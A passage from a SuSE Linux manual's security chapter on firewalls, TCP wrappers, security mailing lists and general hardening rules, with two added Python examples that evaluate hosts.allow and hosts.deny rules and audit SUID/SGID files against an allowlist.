networks if you know exactly what you are doing (see bibliography).
To set up and maintain firewalls, an in-depth knowledge of networks and
the protocols used in them is essential. This knowledge ultimately cannot
be replaced by a graphical interface or a pre-configured setup, such as that
provided by the SuSE Packet Filter Firewall.
Documentation on the SuSE Packet Filter Firewall can be found in
/usr/doc/packages/firewall and /etc/rc.firewall.
If you want to tackle the subject of firewalls in more depth, we recommend
experimenting with and studying the following sources:
The Firewall handbook for Linux 2.0 and 2.2 by Guido Stepken provides
almost everything you need to know in order to construct a secure firewall
with Linux, from detailed technical information to the description of typical
weak points and errors. The firewall handbook is required reading, and is only
available online (http://www.little-idiot.de/firewall/).
The Freefire project is a good starting point for all those who are interested
in firewalls on a free software basis
(http://sites.inka.de/sites/lina/freefire-l/).
TCP Wrappers
TCP wrappers (tcpd) let you restrict certain services to particular networks
or IP addresses. tcpd is activated in SuSE Linux by default. You may see this
in column six of File contents 18.2.2 page 422 and /etc/inetd.conf.
The concept is quite simple: tcpd launches the services that you actually
need, first checking to see if the client is authorized to access them.
This access control takes place via the two files /etc/hosts.allow and
/etc/hosts.deny.
* Access is granted if a combination of client and service is found in the file
/etc/hosts.allow.
* Similarly, access is denied if such a combination is found in the file
/etc/hosts.deny.
* If neither file contains a matching rule, access is allowed.
The first matching rule found is used, and /etc/hosts.allow is searched
first. If access to, for example, the telnet port is allowed in
/etc/hosts.allow, it will be allowed even if it is denied in
/etc/hosts.deny.
The syntax for making entries to these files is described in the manpage for
hosts_access (man 5 hosts_access).
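As an added example, not part of the SuSE manual and not tcpd's own code, the following evaluator reproduces the decision order described above: hosts.allow is consulted first, then hosts.deny, and no match at all means access. It understands a subset of the hosts_access(5) client patterns (ALL, an exact address, a trailing-dot address prefix such as "192.168.3.", a net/mask pair and a leading-dot domain suffix); the EXCEPT operator, continuation lines and option fields are left out. The two sample files and the client addresses are constructed.

```python
# Added example (not from the SuSE manual): evaluates /etc/hosts.allow and
# /etc/hosts.deny in the order tcpd uses. Supports a subset of the
# hosts_access(5) client patterns; sample files below are constructed.
import ipaddress
from typing import List, Optional, Tuple

Rule = Tuple[List[str], List[str]]  # (daemon patterns, client patterns)


def parse_rules(text: str) -> List[Rule]:
    """Parse 'daemon_list : client_list' lines, ignoring comments and blanks."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        daemons, clients = line.split(":", 1)
        rules.append(([d.strip() for d in daemons.split(",")],
                      [c.strip() for c in clients.split(",")]))
    return rules


def client_matches(pattern: str, addr: str, hostname: Optional[str]) -> bool:
    if pattern == "ALL":
        return True
    if pattern.startswith("."):            # domain suffix, e.g. ".trusted.example"
        return hostname is not None and hostname.endswith(pattern)
    if pattern.endswith("."):              # address prefix, e.g. "192.168.3."
        return addr.startswith(pattern)
    if "/" in pattern:                     # net/mask, e.g. "192.168.3.0/255.255.255.0"
        return ipaddress.ip_address(addr) in ipaddress.ip_network(pattern, strict=False)
    return pattern == addr or pattern == hostname   # exact address or host name


def rule_matches(rule: Rule, daemon: str, addr: str, hostname: Optional[str]) -> bool:
    daemons, clients = rule
    return (any(d == "ALL" or d == daemon for d in daemons)
            and any(client_matches(c, addr, hostname) for c in clients))


def access_decision(allow_text: str, deny_text: str, daemon: str,
                    addr: str, hostname: Optional[str] = None) -> str:
    """hosts.allow first, then hosts.deny; no match in either means access."""
    for rule in parse_rules(allow_text):
        if rule_matches(rule, daemon, addr, hostname):
            return "allow"
    for rule in parse_rules(deny_text):
        if rule_matches(rule, daemon, addr, hostname):
            return "deny"
    return "allow"


# Constructed sample files for a home network like the one in this chapter.
HOSTS_ALLOW = """
# local processes may use everything, the home LAN may use telnet and ftp
ALL: 127.0.0.1
in.telnetd, in.ftpd: 192.168.3.
sshd: 192.168.3.0/255.255.255.0, .trusted.example
"""

HOSTS_DENY = """
in.telnetd: 192.168.3.77   # has no effect: hosts.allow already matched
ALL: ALL
"""


def demo() -> List[str]:
    """Decisions for a few constructed clients (daemon, address, host name)."""
    cases = [
        ("in.telnetd", "192.168.3.77", None),          # allowed despite the deny entry
        ("sshd", "203.0.113.5", "x.trusted.example"),  # allowed by domain suffix
        ("sshd", "203.0.113.5", None),                 # caught by ALL: ALL
        ("in.fingerd", "192.168.3.5", None),           # caught by ALL: ALL
    ]
    return [access_decision(HOSTS_ALLOW, HOSTS_DENY, d, a, h) for d, a, h in cases]


if __name__ == "__main__":
    print(demo())
    # Without a catch-all in hosts.deny the fallback applies and access is granted.
    print(access_decision(HOSTS_ALLOW, "", "in.fingerd", "203.0.113.5"))
```

The first case is the situation the text warns about: the explicit deny line for 192.168.3.77 never gets a chance, because the prefix rule in hosts.allow matched first. The last line of the demo shows why a closing "ALL: ALL" in hosts.deny matters: without it, any service not mentioned in either file is reachable from anywhere.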
There is an alternative to TCP wrappers called xinetd, which combines the
features of inetd and tcpd. One disadvantage of xinetd is that the
configuration files of inetd and xinetd are incompatible.
Only one Internet "Super Server" (inetd or xinetd) may be started. You
have to decide which one to use.
In the series sec (Security-related Software) further programs can be found
which can be of help in building a secure system. Just browse through the
packages there.
18.3 Security in SuSE Linux
SuSE offers the following services to accomplish the highest possible
security-oriented distribution:
Two Mailing Lists are Available for Everyone:
* suse-security-announce: contains SuSE notifications of security
problems.
* suse-security: contains notifications and is open to public
discussion.
To subscribe to either of the mailing lists, just send an electronic mail to
majordomo@suse.com, with the contents:
subscribe suse-security or
subscribe suse-security-announce
Central Notification of New Security Problems:
If you find a new security problem (be sure to check the updates available
beforehand), please send an electronic mail to security@suse.de with
a description of the problem. We will attend to it immediately. You can
encrypt the files with the package pgp. Our public PGP key (see footnote 4)
can be downloaded from: http://www.suse.de/security (encryption).
18.4 General Rules
1. Only use `root' for administrative purposes. You should create a user
for your daily work.
2. Try to avoid the commands telnet, rlogin and rsh.
3. Use ssh instead, if you want to work remotely.
4. Deactivate all network services that are not needed.
5. Make sure you have up-to-date versions of relevant packages such as
bind, sendmail and ssh.
6. Remove SUID and SGID bits from all files in the system that are not
essential for normal users to work with.
7. Check your log files regularly.
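To put rule 6 into practice you first need to know which set-id files exist. The following audit script is an added example, not part of the SuSE manual: it walks a directory tree, reports every regular file carrying the SUID or SGID bit, compares the result with a list of programs you have decided are essential, and can strip the bits from a file you do not want. On a real system you would call find_setid_files("/") with an allowlist of absolute paths; demo() exercises the same code on a constructed temporary tree so it runs without touching the system.

```python
# Added example (not from the SuSE manual): audit of SUID/SGID files against
# an allowlist, with a helper that removes the bits. demo() builds a
# constructed temporary tree instead of scanning the real file system.
import os
import stat
import tempfile
from typing import Dict, List, Set

SETID_BITS = stat.S_ISUID | stat.S_ISGID


def find_setid_files(root: str) -> Dict[str, int]:
    """Map each regular file under root that carries SUID or SGID to its mode."""
    found = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)    # lstat: do not follow symbolic links
            except OSError:
                continue               # unreadable or vanished entry
            if stat.S_ISREG(st.st_mode) and st.st_mode & SETID_BITS:
                found[path] = stat.S_IMODE(st.st_mode)
    return found


def unexpected_setid(root: str, allowlist: Set[str]) -> List[str]:
    """Set-id files that are not on the allowlist, sorted for stable reports."""
    return sorted(p for p in find_setid_files(root) if p not in allowlist)


def strip_setid(path: str) -> None:
    """Remove SUID and SGID from one file, keeping the other permission bits."""
    mode = stat.S_IMODE(os.lstat(path).st_mode)
    os.chmod(path, mode & ~SETID_BITS)


def demo() -> List[List[str]]:
    """Build a constructed tree, audit it, strip one file, audit again."""
    with tempfile.TemporaryDirectory() as root:
        layout = {                  # relative path -> mode (constructed sample)
            "bin/su": 0o4755,       # essential SUID program, on the allowlist
            "bin/oddtool": 0o4755,  # SUID program nobody asked for
            "sbin/gtool": 0o2755,   # SGID program nobody asked for
            "bin/normal": 0o755,    # ordinary executable, not reported
        }
        for rel, mode in layout.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(path, mode)
        allowlist = {os.path.join(root, "bin/su")}

        def report() -> List[str]:
            return [os.path.relpath(p, root)
                    for p in unexpected_setid(root, allowlist)]

        before = report()
        strip_setid(os.path.join(root, "bin/oddtool"))
        after = report()
    return [before, after]


if __name__ == "__main__":
    before, after = demo()
    print("unexpected set-id files:", before)
    print("after stripping bin/oddtool:", after)
```

The allowlist is the important design choice: a bare listing of set-id files is long and quickly ignored, whereas a diff against the programs you consciously kept (su, passwd and the like) shows only what changed, which is also what you want to look at during the regular checks of rule 7.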
Footnote 4: PGP key fingerprint = 73 5F 2E 99 DF DB 94 C4 8F 5A A3 AE AF 22 F2 D5